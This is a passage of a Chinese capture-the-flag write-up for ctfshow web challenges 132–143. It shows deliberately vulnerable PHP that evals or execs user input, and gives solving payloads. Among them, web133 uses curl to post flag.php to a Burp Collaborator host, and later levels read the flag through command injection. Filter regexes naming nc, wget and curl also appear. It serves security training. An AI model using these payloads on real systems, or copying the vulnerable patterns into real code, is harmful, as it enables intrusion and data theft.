class="keyword">die</span>(<span class="string">&#x27;bye!!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web132"><a href="#web132" class="headerlink" title="web132"></a>web132</h1><p>首先打开是一个网页，御剑扫一下有robots.txt和admin/index.php</p>
<p>打开admin/index.php得到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;username&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$username</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">    <span class="variable">$password</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">    <span class="variable">$code</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$code</span> === mt_rand(<span class="number">1</span>,<span class="number">0x36D</span>) &amp;&amp; <span class="variable">$password</span> === <span class="variable">$flag</span> || <span class="variable">$username</span> ===<span class="string">&quot;admin&quot;</span>)&#123;</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$code</span> == <span class="string">&#x27;admin&#x27;</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>本题很简单只需要让<code>username=admin&amp;&amp;code=admin</code>即可当然也要满足第一个条件</p>
<h1 id="web133"><a href="#web133" class="headerlink" title="web133"></a>web133</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">//flag.php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$F</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;F&#x27;</span>])&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/system|nc|wget|exec|passthru|netcat/i&#x27;</span>, <span class="variable">$F</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(substr(<span class="variable">$F</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;6个字母都还不够呀?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.substr.php">substr()函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.shell-exec.php">shell_exec()函数</a></p>
<p><code>这个题是自己出的主要是考察，命令执行的骚操作和curl -F的使用</code><br> 分析一下代码发现仿佛是只能读取前面6个字符去执行命令，禁止了命令执行的函数，并且没有写入权限。可能利用就比较可能<br> 但是，如果我们传递的参数就是<code>$F</code>本身，会不会发生变量覆盖？<br> 那我们来一个简单的测试,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">我们传递?F=`$F`;+sleep 3好像网站确实sleep了一会说明的确执行了命令</span><br><span class="line">**那为什么会这样？**</span><br><span class="line">因为是我们传递的`$F`;+sleep 3。先进行substr()函数截断然后去执行eval()函数</span><br><span class="line">这个函数的作用是执行php代码，``是shell_exec()函数的缩写，然后就去命令执行。</span><br><span class="line">而$F就是我们输入的`$F`;+sleep 3 使用最后执行的代码应该是</span><br><span class="line">``$F`;+sleep 3`,就执行成功</span><br><span class="line">这里可能有点绕，慢慢理解</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.ruanyifeng.com/blog/2019/09/curl-reference.html">curl 的参数用法</a></p>
<p>然后就是利用curl去带出flag.php<br> <code>curl -F 将flag文件上传到Burp的 Collaborator Client （ Collaborator Client 类似DNSLOG，其功能要比DNSLOG强大，主要体现在可以查看 POST请求包以及打Cookies）</code></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/473336511">Collaborator Client用法</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># payload </span><br><span class="line">#其中-F 为带文件的形式发送post请求</span><br><span class="line">#xx是上传文件的name值，flag.php就是上传的文件 </span><br><span class="line">?F=`$F`;+curl -X POST -F xx=@flag.php  http://8clb1g723ior2vyd7sbyvcx6vx1ppe.burpcollaborator.net</span><br></pre></td></tr></table></figure>

<p>使用方法：</p>
<p><img src="https://img-blog.csdnimg.cn/20201015162350800.png#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20201015162406514.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDkxNDY0,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<h1 id="web-134"><a href="#web-134" class="headerlink" title="web 134"></a>web 134</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: Firebasky</span><br><span class="line"># @Date:   2020-10-13 11:25:09</span><br><span class="line"># @Last Modified by:   h1xa</span><br><span class="line"># @Last Modified time: 2020-10-14 23:01:06</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$key1 = 0;</span><br><span class="line">$key2 = 0;</span><br><span class="line">if(isset($_GET[&#x27;key1&#x27;]) || isset($_GET[&#x27;key2&#x27;]) || isset($_POST[&#x27;key1&#x27;]) || isset($_POST[&#x27;key2&#x27;])) &#123;</span><br><span class="line">    die(&quot;nonononono&quot;);</span><br><span class="line">&#125;</span><br><span class="line">@parse_str($_SERVER[&#x27;QUERY_STRING&#x27;]);</span><br><span class="line">extract($_POST);</span><br><span class="line">if($key1 == &#x27;36d&#x27; &amp;&amp; $key2 == &#x27;36d&#x27;) &#123;</span><br><span class="line">    die(file_get_contents(&#x27;flag.php&#x27;));</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>简单的函数绕过：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_49480008/article/details/115872899">$_SERVER函数</a></p>
<p><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_extract.asp">extract()函数</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?_POST[key1]=36d&amp;&amp;_POST[key2]=36</span><br></pre></td></tr></table></figure>



<h1 id="web-135"><a href="#web-135" class="headerlink" title="web 135"></a>web 135</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">//flag.php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$F</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;F&#x27;</span>])&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i&#x27;</span>, <span class="variable">$F</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(substr(<span class="variable">$F</span>,<span class="number">0</span>,<span class="number">6</span>));</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;师傅们居然破解了前面的，那就来一个加强版吧&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?F=`$F` ;cp flag.php 666.txt</span><br><span class="line">?F=`$F` ;nl flag.php&gt;666.txt</span><br><span class="line">?F=`$F` ;mv flag.php 666.txt</span><br></pre></td></tr></table></figure>



<h1 id="web-136"><a href="#web-136" class="headerlink" title="web 136"></a>web 136</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">function check($x)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\\$|\.|\!|\@|\#|\%|\^|\&amp;|\*|\?|\&#123;|\&#125;|\&gt;|\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i&#x27;, $x))&#123;</span><br><span class="line">        die(&#x27;too young too simple sometimes naive!&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    check($c);</span><br><span class="line">    exec($c);</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>



<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/jjlovefj/article/details/83176871">Linux tee命令</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">常见用例： tee file //覆盖</span><br><span class="line">tee -a file //追加</span><br><span class="line">tee - //输出到标准输出两次 tee - - //输出到标准输出三次</span><br><span class="line">tee file1 file2 - //输出到标准输出两次,并写到那两个文件中</span><br><span class="line">ls | tee file</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?c=ls \|tee <span class="number">1</span></span><br><span class="line"><span class="comment">//将根目录下的内容写入1</span></span><br><span class="line">访问<span class="number">1</span>，下载文件发现f149_15_h3r3</span><br><span class="line">?c=nl /f149_15_h3r3|tee <span class="number">1</span></span><br><span class="line">访问<span class="number">1</span>，下载文件得flag</span><br></pre></td></tr></table></figure>



<h1 id="web-137"><a href="#web-137" class="headerlink" title="web 137"></a>web 137</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;private class&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">call_user_func(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>调用类中函数，需要调用静态类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">php中 -&gt;与:: 调用类中的成员的区别</span><br><span class="line">-&gt;用于动态语境处理某个类的某个实例</span><br><span class="line">::可以调用一个静态的、不依赖于其他初始化的类方法</span><br><span class="line">123</span><br></pre></td></tr></table></figure>

<p>payload：<code>ctfshow=ctfshow::getFlag</code></p>
<h1 id="web-138"><a href="#web-138" class="headerlink" title="web 138"></a>web 138</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshow</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;private class&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strripos(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>], <span class="string">&quot;:&quot;</span>)&gt;-<span class="number">1</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;private function&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">call_user_func(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>php特性：</p>
<p>考察了call_user_func()用数组形式调用类方法</p>
<p>详看：根据方法名调用call_user_func()详解</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">call_user_func(array($classname, &#x27;say_hello&#x27;));</span><br><span class="line">调用classname这个类里的sya_hello方法</span><br><span class="line"></span><br><span class="line">array[0]=$classname  类名</span><br><span class="line">array[1]=say_hello   say_hello()方法</span><br></pre></td></tr></table></figure>

<p>call_user_func函数里面可以传数组，第一个元素是类名或者类的一个对象，第二个元素是类的方法名，同样可以调用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow[0]=ctfshow&amp;ctfshow[1]=getFlag</span><br></pre></td></tr></table></figure>



<h1 id="web-139"><a href="#web-139" class="headerlink" title="web 139"></a>web 139</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$x</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\\$|\.|\!|\@|\#|\%|\^|\&amp;|\*|\?|\&#123;|\&#125;|\&gt;|\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i&#x27;</span>, <span class="variable">$x</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;too young too simple sometimes naive!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    check(<span class="variable">$c</span>);</span><br><span class="line">    exec(<span class="variable">$c</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>





<h1 id="web-140"><a href="#web-140" class="headerlink" title="web 140"></a>web 140</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f1</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f1&#x27;</span>];</span><br><span class="line">    <span class="variable">$f2</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f2&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9]+$/&#x27;</span>, <span class="variable">$f1</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9]+$/&#x27;</span>, <span class="variable">$f2</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> = <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$f1</span>(<span class="subst">$f2</span>());&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span>(intval(<span class="variable">$code</span>) == <span class="string">&#x27;ctfshow&#x27;</span>)&#123;</span><br><span class="line">                <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>查看<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/types.comparisons.php">PHP类型比较表</a> 可发现</p>
<p><code>eval</code>函数的返回值默认是false，但是如果包含的语句中有return，则返回return的值</p>
<p><strong><code>0==“字符串”</code> 返回的是TRUE</strong></p>
<p><code>intval</code>会将非数字字符转换为0，也就是说 <code>intval(&#39;a&#39;)==0 intval(&#39;.&#39;)==0 intval(&#39;/&#39;)==0</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">md5(phpinfo())</span><br><span class="line">md5(sleep())</span><br><span class="line">md5(md5())</span><br><span class="line">current(localeconv)</span><br><span class="line">sha1(getcwd())     因为/var/www/html md5后开头的数字所以我们改用sha1</span><br></pre></td></tr></table></figure>



<h1 id="web-141"><a href="#web-141" class="headerlink" title="web 141"></a>web 141</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#error_reporting(0);</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^\W+$/&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/109143413">绕过无字母数字的方法参考yu师傅的脚本</a>：这里直接利用取反脚本</p>
<p>绕过return的方式：<br>php中有个有意思的地方，数字是可以和命令进行一些运算的，例如 1-phpinfo();结合减号是可以执行phpinfo()命令的。（不一定是减号，还有加、乘、除号，若用加号。要用+，要进行URL编码，这是个特殊字符，不进行编码会当作空格）</p>
<h1 id="web-142"><a href="#web-142" class="headerlink" title="web 142"></a>web 142</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>))&#123;</span><br><span class="line">        <span class="variable">$d</span> = (<span class="keyword">int</span>)(<span class="variable">$v1</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span>);</span><br><span class="line">        sleep(<span class="variable">$d</span>);</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">?v1=0   	八进制</span><br><span class="line">?v1=0x0		16进制</span><br><span class="line">?v1=0e123	科学计数法</span><br></pre></td></tr></table></figure>



<h1 id="web-143"><a href="#web-143" class="headerlink" title="web 143"></a>web 143</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span 